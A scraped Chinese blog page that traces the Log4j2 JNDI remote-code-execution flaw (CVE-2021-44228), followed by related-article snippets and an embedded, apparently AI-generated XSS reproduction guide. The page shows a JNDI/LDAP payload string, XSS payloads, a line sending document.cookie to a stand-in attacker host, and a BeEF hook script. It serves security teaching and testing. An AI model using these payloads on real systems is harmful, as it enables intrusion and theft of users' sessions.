安全漏洞之Log4j2漏洞复现绕过分析

最新推荐文章于 2025-05-10 07:41:48 发布
最新推荐文章于 2025-05-10 07:41:48 发布
阅读量294 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 网络安全 安全 密码学 ddos c#
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/AzulSystems/article/details/129332793
本文深入探讨了Log4j2的安全漏洞,详细分析了RCE漏洞的工作原理,包括漏洞触发流程、修复尝试以及RC1修复的绕过方法。通过实例展示了如何利用特定的payload绕过RC1修复,并介绍了RC2的最终修复方案。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00 介绍

Log4j2是Java开发常用的日志框架,该漏洞触发条件低,危害大,由阿里云安全团队报告

分配CVE编号:CVE-2021-44228

CVSS评分:10.0(最高只能10分)

POC比较简单

public static void main(String[] args) throws Exception {logger.error("${jndi:ldap://127.0.0.1:1389/badClassName}");
}

POC虽然简单,但是搭建LDAP环境显得有点复杂,marshalsec方式需要自行编译class并搭建HTTP服务端

java -jar LDAPKit.jar [命令]

截图如下

[<img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/8d4fe34cbd114d0f81629915feba971d~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fxuyiqing-1257927651.cos.ap-beijing.myqcloud.com%2Fjava%2F0114.png "https://xuyiqing-1257927651.cos.ap-beijing.myqcloud.com/java/0114.png"" style="margin: auto" />

【一>所有资源获取<一】 1、200份很多已经买不到的绝版电子书 2、30G安全大厂内部的视频资料 3、100份src文档 4、常见安全面试题 5、ctf大赛经典题目解析 6、全套工具包 7、应急响应笔记 8、网络安全学习路线

0x01 RCE分析

首先来看RCE是怎样的原理,先来一段又臭又长的流程分析

看看从logger.error到JndiLookup.lookup中间经历了些什么

从logger.error()层层跟到AbstractLogger.tryLogMessage.log方法

private void tryLogMessage(final String fqcn, final StackTraceElement location, final Level level, final Marker marker, final Message message, final Throwable throwable) {try {log(level, marker, fqcn, location, message, throwable);} catch (final Exception e) {handleLogMessageException(e, fqcn, message);}
}

不动态调试的情况下跟log方法会到AbstractLogger.log方法,实际上这里是org.apache.logging.log4j.core.Loggger.log方法

@Override
protected void log(final Level level, final Marker marker, final String fqcn, final StackTraceElement location, final Message message, final Throwable throwable) {final ReliabilityStrategy strategy = privateConfig.loggerConfig.getReliabilityStrategy();if (strategy instanceof LocationAwareReliabilityStrategy) {// 触发点((LocationAwareReliabilityStrategy) strategy).log(this, getName(), fqcn, location, marker, level,message, throwable);} else {strategy.log(this, getName(), fqcn, marker, level, message, throwable);}
}

跟入这里的log方法到org/apache/logging/log4j/core/config/DefaultReliabilityStrategy.log

@Override
public void log(final Supplier<LoggerConfig> reconfigured, final String loggerName, final String fqcn,final StackTraceElement location, final Marker marker, final Level level, final Message data,final Throwable t) {loggerConfig.log(loggerName, fqcn, location, marker, level, data, t);
}

进入LoggerConfig.log方法

@PerformanceSensitive("allocation")public void log(final String loggerName, final String fqcn, final StackTraceElement location, final Marker marker,final Level level, final Message data, final Throwable t) {// 无需关心的代码...try {// 跟入log(logEvent, LoggerConfigPredicate.ALL);} finally {ReusableLogEventFactory.release(logEvent);}}

进入LoggerConfig另一处重载log方法

protected void log(final LogEvent event, final LoggerConfigPredicate predicate) {if (!isFiltered(event)) {// 跟入processLogEvent(event, predicate);}
} 
private void processLogEvent(final LogEvent event, final LoggerConfigPredicate predicate) {event.setIncludeLocation(isIncludeLocation());if (predicate.allow(this)) {// 关键点callAppenders(event);}logParent(event, predicate);
}

可以看到调用appender.control的callAppender方法

@PerformanceSensitive("allocation")
protected void callAppenders(final LogEvent event) {final AppenderControl[] controls = appenders.get();//noinspection ForLoopReplaceableByForEachfor (int i = 0; i < controls.length; i++) {controls[i].callAppender(event);}
}

层层跟入到AppenderControl.tryCallAppender方法

private void callAppender0(final LogEvent event) {ensureAppenderStarted();if (!isFilteredByAppender(event)) {// 跟入tryCallAppender(event);}
} 
private void tryCallAppender(final LogEvent event) {try {// 跟入appender.append(event);} catch (final RuntimeException error) {handleAppenderError(event, error);} catch (final Exception error) {handleAppenderError(event, new AppenderLoggingException(error));}
}
最低0.47元/天 解锁文章

200万优质内容无限畅学
gool奇米
关注
漏洞复现】Apache Log4j2 远程代码执行漏洞
李火火的安全圈
07-20 1124
ApacheLog4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。......
Struts2框架下Log4j2漏洞检测方法分析与总结
Hacker_j1的博客
07-07 1300
叒有一段时间没写文章了,正好周末有时间就来写写,本文来讲讲有关SQL注入相关的知识点会尽可能详细的写出来,比较适合刚入门安全的小白进行学习,希望能在面试或实战中助你一臂之力。如有大佬发现文中内容有错误的地方恳请斧正!也欢迎各位师傅共同交流学习技术!
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现
玄道的网安博客
01-28 5129
漏洞概述 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 环境搭建 这里使用vulhub来搭建环境 https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645 进入目录并启动环境 cd vulhub-master/log4j/CVE-2017-5645/ docker-...
深入分析Log4j 漏洞
嘉禾笔记
12-16 1万+
几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的。 Apache Log4j2 是一个基于 Java 的日志工具,是Log4j的升级版本,引入了很多丰富的特性,包括高性能,低垃圾收集,插件系统等。目前很多互联网公司以及耳熟能详的公司的系统或者开源框架都在使用Log4j22021.12.7,Log4j首次被发现了一个非常严重的漏洞,在当天Log4j就发布了log4j-2.15.0-rc1,但是12.
log4j漏洞复现
最新发布
m0_72199724的博客
05-10 854
Log4j是一个广泛使用的Java日志框架,具有高度灵活性、高效性和可扩展性,适用于调试和监控应用程序。然而,Log4j也暴露了多个安全漏洞,如CVE-2017-5645和CVE-2021-44228。CVE-2017-5645是一个反序列化漏洞,攻击者通过发送恶意payload触发代码执行,影响Log4j 2.8.2之前的2.x版本。CVE-2021-44228是一个远程代码执行(RCE)漏洞,攻击者利用JNDI协议加载远程恶意脚本,影响Log4j 2.0到2.15.0-rc2版本。漏洞复现表明,攻击者可
【转载】二次通告--Apache log4j-2.15.0-rc1版本存在绕过风险,请广大用户尽快更新版本
jason的java世界
12-10 1181
【转载自360众测】 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。 2021年12月09日,360漏洞云监测到Apache 官方于2021年12月07日发布了log4j-2.15.0-rc1版本。经360漏洞安全专家研...
Apache Log4j 远程命令执行漏洞CVE-2021-44228
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
12-09 1485
Apache Log4j 远程命令执行漏洞,CVE-2021-44228 通过jndi协议远程调用恶意类执行命令
log4j RCE waf 绕过技巧
weixin_50464560的博客
07-09 2031
log4j waf 绕过技巧 - ph4nt0mer - 博客园 (cnblogs.com)原来的poc: Copy绕过poc: Copy可行 Copy不一定可行 Copy可行unico字符串下列表达式均等价于abc: Copylog4j poc集合 https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis● 不出现port,避免被waf匹配ip:port Copy
Apache Log4j2漏洞复现
qq_62056583的博客
07-20 990
复现分析【CVE-2021044228】Apache Log4j2 Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现漏洞
Log4j漏洞分析
a1290320893的博客
12-13 2724
先看问题: 原本我只是希望logger.info(“hello,{}”,message); 用message来替换{}输出:hello,pxq; 但是假如我的message是${java:os},就是输出设备的具体信息;像这种可能存在隐患; 进一步如果String strings = “${jndi:rmi://127.0.0.1:1899/asd}”; 就会去执行注册中心127.0.0.1:1899中的名为asd的服务,只要用户使用了logger.info()且版本在log4j-api的版本在2.14.0
log4j漏洞详解
weixin_61638307的博客
03-21 4616
JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,举个例子:它就相当于的你的一个秘书,用了一些手段,你可以去指使他去干一些事情,这个手段就是lookup(),相当于你给秘书一个目标。先给这些名词简单说一下Ldap:你可以将它理解为一个目标数据库。
Log4j2漏洞
qq_20025777的博客
12-10 2万+
Log4j2漏洞危害:高危、远程代码执行
log4j漏洞分析
weixin_47623655的博客
04-11 824
近年来,log4j漏洞成为了备受关注的话题,因为它可能会导致攻击者远程执行代码。在本文中,我们将详细讨论log4j漏洞的背景、原理和应对措施。
log4j漏洞分析及总结
热门推荐
csd_ct的专栏
02-14 4万+
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。 漏洞描述及影响 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。
Apache Log4j 漏洞验证
柳似烟的专栏
12-15 3546
首先下载JNDI-Injection-Exploit,该jar包实现RMI、LDAP服务功能,对外提供服务,且包含用于执行攻击命令的ExecTemplateJDK7.class和ExecTemplateJDK8.class模版文件。 下载包含漏洞版本的log4j的jar包 使用如下3个jar包文件 添加上面3个jar包到工程: 编写测试代码: import org.apache.log4j.Logger; public class Log4jDemo { /** ..
Log4j 2 (CVE-2021-44228)漏洞复现
Pluto.的博客
11-21 669
Log4j 2 (CVE-2021-44228)漏洞复现
Log4j2漏洞复现&原理&补丁绕过
无问社区的博客
07-17 787
我tm都呕了,昨晚出了这个洞,在家复现半天没搞出来,然后凌晨快两点的时候成功了两次,然后又不行,然后睡了,贼jb真实。然后今天来公司随便搞了两下就成功了,唯一的变化就是换了台电脑,贼jb恐怖。经过测试就是jdk版本的问题。0x02 漏洞复现这里我一共使用了两个jdk版本8u202的情况比较特殊,其实我今天凌晨在家里用的也是8u202的版本,失败了。今天来公司也是用的8u202版本的jdk,成功了。
实战XSS漏洞复现
04-02
<think>好的,我需要帮助用户了解如何复现XSS漏洞以进行安全测试。首先,我得整理XSS的基本概念,确保用户明白漏洞的原理。根据提供的引用,XSS分为反射型、存储型和DOM型,这点要明确。 接下来,复现步骤需要详细分点。用户可能需要知道如何搭建测试环境,比如使用PHPStudy或者Docker,引用中的例子提到了本地服务器,可以引用相关部分。然后构造测试Payload,引用里提到了<script>alert(1)</script>和更隐蔽的console.log(1),这些例子需要包含进去,并说明不同场景下的应用。 实例分析部分,用户可能想知道具体的漏洞复现过程。比如反射型XSS,根据引用中的URL示例,需要展示如何构造恶意链接,并解释参数如何触发漏洞。存储型XSS则要举例用户输入如何被保存并显示给其他用户,引用中的PHPmyWind案例可以作为例子,但用户提供的引用中没有详细说明,可能需要参考已有的信息。 工具使用方面,BeEF框架在引用中被提到用于获取Cookie,这部分要介绍工具的作用和基本使用方法,帮助用户了解如何利用工具进行深入利用。 防御措施也是重要的一环,用户可能想知道如何预防XSS,引用中提到输入验证、过滤和转义,需要强调这些方法,并建议使用安全的编码函数。 最后,生成相关问题,确保覆盖用户可能进一步提问的方向,比如不同XSS类型的区别、工具推荐、防御方法以及实际漏洞案例。需要检查引用标记是否正确,每个步骤都自然引用对应的来源,避免遗漏。 整个过程要保持语言简洁,步骤清晰,符合用户要求的格式,使用中文,并且正确应用LaTeX格式。同时注意不要使用Markdown,用自然的分段和标号。检查是否有遗漏的引用,确保每个引用标记对应正确的来源,比如复现步骤中的实例分析引用正确的示例链接。</think>### XSS漏洞复现方法及实例分析 #### 一、XSS漏洞基础 XSS(跨站脚本攻击)通过注入恶意脚本代码到网页中,利用用户浏览器执行非法操作。根据攻击方式可分为以下三类: 1. **反射型XSS**:恶意脚本通过URL参数注入,服务器直接返回未过滤的内容[^1]。 2. **存储型XSS**:恶意脚本存储到服务器数据库,其他用户访问时触发[^2]。 3. **DOM型XSS**:完全由客户端JavaScript解析漏洞导致,不经过服务器处理[^1]。 --- #### 二、复现步骤与实例 ##### 1. 搭建测试环境 - **本地环境**:使用PHPStudy或Docker搭建Web服务器(如引用示例中的`http://localhost:8080`[^3])。 - **目标页面**:选择存在输入输出交互的页面(如留言板、搜索框)。 ##### 2. 构造测试Payload - **基础测试**: ```html <script>alert(1)</script> <!-- 触发弹窗 --> ``` - **隐蔽测试**: ```javascript console.log(1) <!-- 控制台输出,避免弹窗引起注意[^4] --> ``` - **编码绕过**: 使用URL编码或HTML实体编码绕过简单过滤: ```url http://localhost:8080/?%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22 [^3] ``` ##### 3. 实例分析:反射型XSS复现 1. **目标URL**:假设存在搜索功能页面`search.php?keyword=test`。 2. **注入Payload**: ```url http://localhost:8080/search.php?keyword=<script>alert(document.cookie)</script> ``` 3. **触发漏洞**:服务器未过滤参数直接返回页面,脚本执行并泄露Cookie[^5]。 ##### 4. 存储型XSS复现(以留言板为例) 1. **提交恶意内容**: ```html <script>fetch('http://attacker.com/steal?data=' + document.cookie)</script> ``` 2. **持久化存储**:恶意脚本保存到数据库。 3. **其他用户访问**:加载留言时自动发送Cookie到攻击者服务器[^2]。 ##### 5. 工具辅助利用 - **BeEF框架**:用于控制受害者浏览器,执行高级攻击(如截图、键盘记录): ```bash # Kali中启动BeEF beef-xss ``` 注入Payload: ```html <script src="http://<beef_server>:3000/hook.js"></script> ``` --- #### 三、防御措施 1. **输入过滤**:过滤`<script>`、`onerror`等危险标签/属性。 2. **输出转义**:使用HTML实体编码(如`<`转为`<`)[^2]。 3. **CSP策略**:通过HTTP头限制脚本来源。 4. **安全函数**:PHP中可用`htmlspecialchars()`,JavaScript中避免`innerHTML`。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值